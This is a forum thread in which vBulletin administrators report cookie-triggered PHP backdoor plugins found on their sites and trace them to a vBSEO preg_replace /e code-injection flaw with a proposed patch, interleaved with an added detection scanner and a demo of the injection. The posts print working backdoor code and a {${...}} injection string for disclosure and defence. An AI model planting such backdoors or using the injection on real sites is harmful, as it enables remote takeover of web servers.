Possible Exploit

  • #1

    I noticed this plugin in global_complete on several of our sites:

    PHP Code:
    /* vBulletin Templates Cookie Caching */
    // Tag and secret chosen by whoever planted this; the tag is echoed back as a
    // response header so infected hosts can be recognised.
    $vbr = "ujhdfgyj";
    $vbh = "6a234a2a6b89b531b6720b9f86f42d7f";

    // Beacon: any request carrying a "vbinit" cookie gets a "Cache-ID: ujhdfgyj"
    // header and page rendering stops. The chr(10) branches are do-nothing fillers.
    isset($_COOKIE["vbinit"]) ? die(header("Cache-ID: $vbr")) : chr(10);

    // Command channel: needs a "vbauth" cookie whose md5 equals the hard-coded
    // digest (a password only the operator knows) and a "vbcache" cookie of the
    // form  cache:<md5($vbr.$vbh)>:<function name>:<argument>. When both check
    // out, the named function (any lowercase PHP function name) is called with
    // the argument.
    (isset($_COOKIE["vbauth"])
        && (md5($_COOKIE["vbauth"]) == "a32229ad78262c52c4073b07fdd58912")
        && isset($_COOKIE["vbcache"])
        && preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/", $_COOKIE["vbcache"], $m)
        && (md5($vbr . $vbh) === $m[1]))
        ? $m[2]($m[3]) : chr(10);
    I googled the phrase "vBulletin Templates Cookie Caching" and saw that someone else noticed it yesterday too:

    http://www.vbsoporte.com/f29/posible...oso-foro-2866/

    All of our installs are running the latest version, 3.8.7 PL2. I am going through all the sites and disabling it as I find it. I have no idea if this is a vB exploit, or vBSEO, or any other product we may have installed, but I suggest everyone check their plugin list. It is installed under the vBulletin product, so it should be right around the top of the list. Still investigating...

  • #2
    Actually, I have more... This one is in the same hook location, different site:

    Code:
    /* vBCMS Global Thread Cache */
    // Same idea, minus the password gate: a "vbulletin_collapse" cookie (a name
    // vBulletin itself uses for collapsed forum sections) of the form
    //   menu:<function name>:<argument>
    // gets the named function called with the argument. chr(20) is a no-op.
    (isset($_COOKIE["vbulletin_collapse"])
        && preg_match("/menu:([a-z]+):(.*)/", $_COOKIE["vbulletin_collapse"], $m))
        ? $m[1]($m[2]) : chr(20);

    I also saw this code:

    Code:
    /* vBulletin Dynamic Menu Filters */
    // Identical code under a different title.
    (isset($_COOKIE["vbulletin_collapse"])
        && preg_match("/menu:([a-z]+):(.*)/", $_COOKIE["vbulletin_collapse"], $m))
        ? $m[1]($m[2]) : chr(20);

  • #3
    I have just checked a site of ours without vBSEO: no exploit. I then checked a personal site of mine that has nothing to do with the other sites, and it has vBSEO. The exploit was there. Not 100% confirmation by any means; just, so far, out of the 20-something sites that I have checked, the one that doesn't have vBSEO is not infected. I have quite a few more to check.

  • #4
    I just found it on the latest version of vB 4 too.

  • #5
    Just got confirmation from a peer that it is on their system too. The only common thread we have right now is vBSEO.

  • #6
    Have you notified vBSEO?

  • #7
    Yes I have, and pointed them to this thread.

  • #8
    Just confirmed with 3 other peers in the field. All with vBSEO. People, check your plugins!

  • #9
    I have a number of sites I've checked with vBSEO installed and they didn't have this plugin. However, a few sites, all with vBSEO, have them. One site had a "test" plugin for ajax_complete and it referenced:

    Code:
    eval($_COOKIE['c']);

    Here is a site that references a PHP compromise with similar code...

    http://translate.google.com/translat...26prmd%3Dimvns

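A detection pass over the plugin table, added here as an example; it is not code from the thread or from vBulletin/vBSEO. It encodes the traits the plugins quoted in posts #1, #2 and #9 share (a $_COOKIE read that feeds a variable function call or eval(), the md5 password gate, the die(header()) beacon) as regexes and runs them over constructed rows shaped like vBulletin 3.8's plugin table. The column names (pluginid, product, hookname, title, phpcode), the row ids and the two benign plugins are assumptions; the malicious phpcode is copied from the posts above:

```php
<?php
// Added example, not code from the thread or from vBulletin/vBSEO: flag rows of
// the vBulletin plugin table that match the cookie-triggered backdoor pattern
// quoted in posts #1, #2 and #9. On a live install the rows would come from
//   SELECT pluginid, product, hookname, title, phpcode FROM plugin
// (column names assumed from vBulletin 3.8's schema); the rows below are
// constructed, with the malicious phpcode copied from the thread.

/**
 * Return the names of the indicators whose regex matches the plugin's PHP code.
 * Each regex is a heuristic over the source text, not a parser; together they
 * describe what the backdoors in this thread have in common.
 */
function backdoor_indicators(string $phpcode): array
{
    $indicators = [
        // A plugin reading $_COOKIE directly is already unusual; the backdoors
        // here hide behind cookie names that look like vBulletin's own.
        'cookie_read'  => '/\$_COOKIE\s*\[/',
        // $m[2]($m[3]): one captured string used as a function name and another
        // as its argument (posts #1 and #2).
        'dynamic_call' => '/\$[A-Za-z_]\w*\s*\[\s*\d+\s*\]\s*\(\s*\$[A-Za-z_]\w*\s*\[\s*\d+\s*\]\s*\)/',
        // eval() fed straight from a cookie (post #9).
        'eval_cookie'  => '/\beval\s*\(\s*\$_COOKIE/',
        // md5(cookie) compared with a hard-coded 32-hex digest: the attacker's
        // password gate (post #1).
        'hashed_gate'  => '/md5\s*\(\s*\$_COOKIE[^)]*\)\s*={2,3}\s*["\'][0-9a-f]{32}["\']/i',
        // die(header(...)): the "Cache-ID" beacon that lets whoever planted it
        // check which hosts are still infected (post #1).
        'beacon'       => '/die\s*\(\s*header\s*\(/',
    ];
    $hits = [];
    foreach ($indicators as $name => $regex) {
        if (preg_match($regex, $phpcode) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** A cookie read alone is not enough; it has to reach a call or an eval(). */
function is_suspicious(array $hits): bool
{
    return in_array('cookie_read', $hits, true)
        && (in_array('dynamic_call', $hits, true) || in_array('eval_cookie', $hits, true));
}

/** Return the rows that look like backdoors, each with its indicator list. */
function scan_plugins(array $rows): array
{
    $flagged = [];
    foreach ($rows as $row) {
        $hits = backdoor_indicators($row['phpcode']);
        if (is_suspicious($hits)) {
            $flagged[] = $row + ['indicators' => $hits];
        }
    }
    return $flagged;
}

// Constructed rows: the first three carry code quoted in the thread, the last
// two are benign plugins (the final one reads a cookie for a legitimate reason).
$rows = [
    ['pluginid' => 17, 'product' => 'vbulletin', 'hookname' => 'global_complete',
     'title' => 'vBulletin Templates Cookie Caching', 'phpcode' => <<<'CODE'
$vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);
(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])
&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
CODE
    ],
    ['pluginid' => 18, 'product' => 'vbulletin', 'hookname' => 'global_complete',
     'title' => 'vBCMS Global Thread Cache', 'phpcode' => <<<'CODE'
(isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
CODE
    ],
    ['pluginid' => 19, 'product' => 'vbulletin', 'hookname' => 'ajax_complete',
     'title' => 'test', 'phpcode' => 'eval($_COOKIE[\'c\']);'],
    ['pluginid' => 3, 'product' => 'vbulletin', 'hookname' => 'forumhome_start',
     'title' => 'Forum home notice', 'phpcode' => '$vbulletin->options[\'notice\'] = \'Welcome back\';'],
    ['pluginid' => 4, 'product' => 'vbulletin', 'hookname' => 'forumhome_start',
     'title' => 'Remember collapsed sections', 'phpcode' => <<<'CODE'
$collapsed = isset($_COOKIE['vbulletin_collapse']) ? explode(',', $_COOKIE['vbulletin_collapse']) : array();
CODE
    ],
];

foreach (scan_plugins($rows) as $row) {
    printf("plugin %d (%s, hook %s) \"%s\": %s\n", $row['pluginid'], $row['product'],
        $row['hookname'], $row['title'], implode(', ', $row['indicators']));
}
```

Run with `php scan_plugins.php`: the three rows taken from the thread are printed with their indicators (the post #1 sample trips all four cookie-related checks plus the beacon), the two benign rows are not, and the plugin that merely reads vbulletin_collapse stays quiet because a cookie read on its own is not flagged. On a real install, feed it the rows from the plugin table and look at the hookname column as well: the samples in this thread all sit in global_complete, which runs on every page.
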
  • #10
    If this is the exploit that causes Google searches to redirect elsewhere (a la filestore.info), the reason vBSEO gets targeted is that it's designed to increase search engine crawling.

    How they got in is not a vBSEO hole but, more than likely, people not securing all of the writable directories that vBulletin has to offer.

  • #11
    Ace, sorry, I disagree. They are somehow attacking the title replace feature to INJECT code. It IS a vBSEO hole. We are narrowing it down...

  • #12
    OK. Best of luck figuring it out; I'm watching your ticket with great interest.

  • #13
    Here it is folks, in functions_vbseocp_abstract.php

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        // The /e modifier evaluates the replacement as PHP after substituting the
        // back-references. "$1" is a double-quoted PHP string, so a captured key
        // containing {${...}} is executed rather than treated as text.
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    I recommended a patch here over a YEAR ago when we were getting hacked, and they said they were going to put it in the latest version. They did not. This needs to be:

    PHP Code:
    public static function proc_deutf($ptxt, $tocharset)
    {
        // '$1' in single quotes: the capture is an opaque string literal (the /e
        // modifier has already run addslashes() on it), so nothing in it is interpolated.
        $ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
        return $ptxt;
    }

    Last edited by Jafo; Mon 23rd Jan '12, 7:32am.

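To see why the single-quote change in post #13 matters, here is the construct rebuilt as an added example; it is not vBSEO's code and not from the thread. PHP 7 removed the /e modifier, so the block reproduces what /e did (addslashes() on the back-references, substitution into the replacement string, eval() of the result) with preg_replace_callback(), then feeds one benign and one hostile 'key' => value string through the shipped replacement string and the patched one. The regex and both replacement strings are taken from the post; mark_injected() is a hypothetical sentinel standing in for an attacker's payload, the inputs are constructed, and the iconv extension is assumed to be present, as the original requires:

```php
<?php
// Added example, not vBSEO's code and not from the thread: it rebuilds the
// preg_replace() /e construct that post #13 points at and runs the shipped
// replacement string and the patched one over the same input, so the effect of
// "$1" versus '$1' can be observed. PHP 7 removed the /e modifier, so its
// semantics are reproduced here: back-references go through addslashes(), are
// substituted into the replacement template, and the result is eval()'d.

/** Evaluate one substituted replacement template, as /e used to do. */
function eval_replacement(string $code): string
{
    // The template assigns $_s. It is pre-declared so that the sentinel payload
    // below resolves to a defined variable and the demo stays warning-free.
    $_s = null;
    return (string) eval('return ' . $code . ';');
}

/**
 * preg_replace() with the old /e semantics, limited to $N back-references,
 * which is the only form the vBSEO template uses.
 */
function preg_replace_eval(string $pattern, string $template, string $subject): string
{
    return preg_replace_callback($pattern, function (array $m) use ($template): string {
        $code = preg_replace_callback('/\$(\d+)/', function (array $ref) use ($m): string {
            return addslashes($m[(int) $ref[1]] ?? '');
        }, $template);
        return eval_replacement($code);
    }, $subject);
}

// As shipped (first block in post #13): the capture lands inside a double-quoted
// PHP string, so a key containing {${expr}} has expr executed when the template
// is evaluated. $tocharset is concatenated in exactly as the original does.
function proc_deutf_vulnerable(string $ptxt, string $tocharset): string
{
    return preg_replace_eval(
        '#\'([^\']*)(\'\s*\=\>)#mi',
        '"\'".(($_s = iconv("UTF-8", \'' . $tocharset . '\', "$1")) ? $_s : "$1").stripslashes(\'$2\')',
        $ptxt
    );
}

// The patch (second block in post #13): single quotes around $1, so the capture
// is an opaque string literal; addslashes() has already escaped any quote in it.
function proc_deutf_patched(string $ptxt, string $tocharset): string
{
    return preg_replace_eval(
        '#\'([^\']*)(\'\s*\=\>)#mi',
        '"\'".(($_s = iconv("UTF-8", \'' . $tocharset . '\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')',
        $ptxt
    );
}

// Hypothetical sentinel standing in for whatever an attacker would call. It
// counts its invocations and returns the name of a variable that exists in the
// eval scope, so the variable lookup that {${...}} performs afterwards finds one.
function mark_injected(): string
{
    $GLOBALS['injected'] = ($GLOBALS['injected'] ?? 0) + 1;
    return '_s';
}

/** Run both versions over a benign key and a hostile one; report what fired. */
function run_demo(): array
{
    // Constructed inputs in the 'key' => value shape the regex looks for.
    $inputs = [
        'benign'  => "'Thread title' => 'replacement'",
        'hostile' => '\'{${mark_injected()}}\' => \'replacement\'',
    ];
    $results = [];
    foreach (['vulnerable' => 'proc_deutf_vulnerable', 'patched' => 'proc_deutf_patched'] as $label => $fn) {
        foreach ($inputs as $kind => $input) {
            $GLOBALS['injected'] = 0;
            $output = $fn($input, 'UTF-8');
            $results["$label/$kind"] = ['output' => $output, 'sentinel_calls' => $GLOBALS['injected']];
        }
    }
    return $results;
}

foreach (run_demo() as $case => $r) {
    printf("%-19s sentinel calls: %d  output: %s\n", $case, $r['sentinel_calls'], $r['output']);
}
```

Only the vulnerable/hostile case reports sentinel calls, and it reports two of them: the template interpolates "$1" once as the iconv() argument and again in the fallback branch, and the sentinel's return value is an empty string, so the fallback runs. With '$1' the same key comes back unchanged as text. The emulation reproduces the hazard rather than removing it: a replacement string that is eval()'d is code, and the patch only stops the title's characters from reaching that code as syntax.
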
  • #14
    Title replaces happen in real time as the page is pulled. These are not stored anywhere.

    I highly suggest checking your server logs for more detailed information or entries relating to product changes.

  • #15
    Brianso, please look at the above code. We went through this a year ago; you guys worked with us to supply the patch, but you never included it in your product! That is why we got hit: because we just upgraded to the latest version.
